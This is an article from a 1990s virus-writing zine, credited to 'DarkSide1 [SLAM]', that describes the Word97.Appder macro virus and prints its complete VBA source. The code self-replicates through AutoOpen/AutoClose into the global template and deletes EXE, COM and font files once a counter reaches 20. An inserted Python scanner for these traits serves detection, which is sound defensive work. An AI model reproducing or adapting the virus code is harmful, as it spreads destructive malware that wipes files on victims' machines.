SLAM3.015: Word97 Appder Virus Analysis by DarkSide1 [SLAM]
Word97 Appder Virus Analysis
Many people now work with M$ Office 97, which includes a real VBA (Visual Basic for Applications). Other macro viruses were created under M$ Word 6.0/7.0 using WordBasic and can't spread under Word 97 or Word 8.0. No problem! ;) Now many macro viruses like Wazzu, Appder, Rapi, Kompu and others can run in a specific 'version' for Word 97. Of course, many new macro viruses specific to Word 97 are ready, like NightShade, Eifel, SLAM97 and more!
Word97.Appder is the macro virus which I use as a sample; you can view the code under VBA_PROJECT, it's easy to understand ;)
First, a short description of Appder:
- Appder contains two original macros in NORMAL.DOT: Appder and AutoClose, but while infecting documents it copies them to three macros: Appder, AutoOpen and AutoClose. AutoOpen is the same macro as Appder, and it infects the global macro area when an infected document is opened.
- Appder creates the "NTTHNTA=value" line in the "[Microsoft Word]" section of the WINWORD6.INI file and increases this value while infecting any document. When this value reaches 20, the virus tries to delete the files:
  - C:\DOC\*.EXE
  - C:\DOC\*.COM
  - C:\WINDOWS\*.EXE
  - C:\WINDOWS\SYSTEM\*.TTF
  - C:\WINDOWS\SYSTEM\*.FOT
- The version for Word 6.0/7.0 was reported in the wild during 1997.
And now the same Appder code, specific to Word 97:
================begin Word97 Appder=====================
-----------------
Macro Appder.MAIN
-----------------
'Virus - NTTHNTA
Public Sub MAIN()
Dim iMacroCount
Dim i
Dim AClose
Dim Ad
Dim sMe$
Dim sMacro$
Funyour
On Error GoTo -1: On Error GoTo Quit
iMacroCount = WordBasic.CountMacros(0, 0)
For i = 1 To iMacroCount
If WordBasic.[MacroName$](i, 0, 0) = "AutoClose" Then
AClose = -1
End If
If WordBasic.[MacroName$](i, 0, 0) = "Appder" Then
Ad = -1
End If
Next i
If Not AClose And Not Ad Then
sMe$ = WordBasic.[FileName$]()
sMacro$ = sMe$ + ":Appder"
WordBasic.MacroCopy sMacro$, "Global:Appder"
sMacro$ = sMe$ + ":AutoClose"
WordBasic.MacroCopy sMacro$, "Global:AutoClose"
End If
Quit:
End Sub
Private Sub Funyour()
Dim WOpen$
Dim sales
WOpen$ = WordBasic.[GetPrivateProfileString$]("Microsoft Word", " NTTHNTA", "WINWORD6.INI")
sales = WordBasic.Val(WOpen$) + 1
WordBasic.SetPrivateProfileString "Microsoft Word", "NTTHNTA", Str(sales), "WINWORD6.INI"
WOpen$ = WordBasic.[GetPrivateProfileString$]("Microsoft Word", "NTTHNTA", "WINWORD6.INI")
If WOpen$ = "20" Then
WordBasic.SetPrivateProfileString "Microsoft Word", "NTTHNTA", "1", "WINWORD6.INI"
WordBasic.Kill "C:\DOC\*.EXE"
WordBasic.Kill "C:\DOC\*.COM"
WordBasic.Kill "C:\WINDOWS\*.EXE"
WordBasic.Kill "C:\WINDOWS\SYSTEM\*.TTF"
WordBasic.Kill "C:\WINDOWS\SYSTEM\*.FOT"
End If
End Sub 'Funyour
--------------------
Macro AutoClose.MAIN
--------------------
' Virus - NTTHNTA
Public Sub MAIN()
Dim sMe$
Dim sTMacro$
Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSaveAs(False)
On Error GoTo -1: On Error GoTo Quit
WordBasic.CurValues.FileSaveAs dlg
If dlg.Format = 0 Then dlg.Format = 1
sMe$ = WordBasic.[FileName$]()
sTMacro$ = sMe$ + ":AutoOpen"
WordBasic.MacroCopy "Global:Appder", sTMacro$
sTMacro$ = sMe$ + ":Appder"
WordBasic.MacroCopy "Global:Appder", sTMacro$
sTMacro$ = sMe$ + ":AutoClose"
WordBasic.MacroCopy "Global:AutoClose", sTMacro$
WordBasic.FileSaveAs dlg
GoTo Done
Quit:
If Err.Number <> 102 Then
WordBasic.FileSaveAs dlg
End If
Done:
End Sub
==================end Word97 Appder=====================
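A defender's triage of the traits described above, as an added example that is not part of the original article: it flags auto-run macros, macro copying to or from the global template and wildcard Kill calls in extracted macro text, and reads the NTTHNTA counter from WINWORD6.INI text. The function names and sample inputs are constructed for illustration, and the macro source is assumed to have been extracted to text already.

```python
import re

# Traits taken from the Appder description and listing on this page.
AUTO_MACROS = {"autoopen", "autoclose"}
RULES = {
    "copies macros to/from the global template":
        re.compile(r'MacroCopy\b.*"Global:', re.I),
    "deletes files by wildcard":
        re.compile(r'\bKill\s+"[^"]*[*?][^"]*"', re.I),
    "touches the NTTHNTA counter":
        re.compile(r'PrivateProfileString\b.*NTTHNTA', re.I),
}


def scan_macros(modules):
    """modules maps macro name -> source text; returns a set of findings."""
    findings = set()
    for name, source in modules.items():
        if name.lower() in AUTO_MACROS:
            findings.add(f"{name}: runs automatically")
        # Ignore comment lines so a keyword inside a remark is not flagged.
        code = [l for l in source.splitlines() if not l.lstrip().startswith("'")]
        for label, rx in RULES.items():
            if any(rx.search(line) for line in code):
                findings.add(f"{name}: {label}")
    return findings


def read_counter(ini_text):
    """Return NTTHNTA from [Microsoft Word] as int, or None if absent/invalid.
    Section and key are matched case-insensitively, as Windows INI calls do."""
    section = None
    for line in ini_text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif section == "microsoft word" and "=" in line:
            key, _, value = line.partition("=")
            if key.strip().upper() == "NTTHNTA":
                return int(value) if value.strip().isdecimal() else None
    return None


# Constructed sample input (not taken from a real system).
SAMPLE_MODULES = {
    "AutoOpen": 'WordBasic.MacroCopy sMacro$, "Global:Appder"\n'
                'WordBasic.Kill "C:\\DOC\\*.EXE"',
    "Notes": "' Kill \"*.tmp\" appears only in a comment\nMsgBox \"hi\"",
}
SAMPLE_INI = "[Windows]\nNTTHNTA=3\n[microsoft word]\nNTTHNTA= 7\n"
```

A counter that is present at all means the Appder macro has run on that machine; the article puts the file deletion at a value of 20.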
Final comments:
- Now any antivirus finds macro viruses for Word 97.
- Before, under Word 6.0/7.0, you needed to write the WordBasic code of your macro virus in the specific language of your Word version (Spanish, English, French, German...); now the VBA code for Word 97 is the same for other language versions. ;-) Well, I have the Spanish version and saw the same code as in the English version. Of course, Word 97 has the same specific macro names for your language version.
DarkSide1 [SLAM]
MacroVirus Writer/Research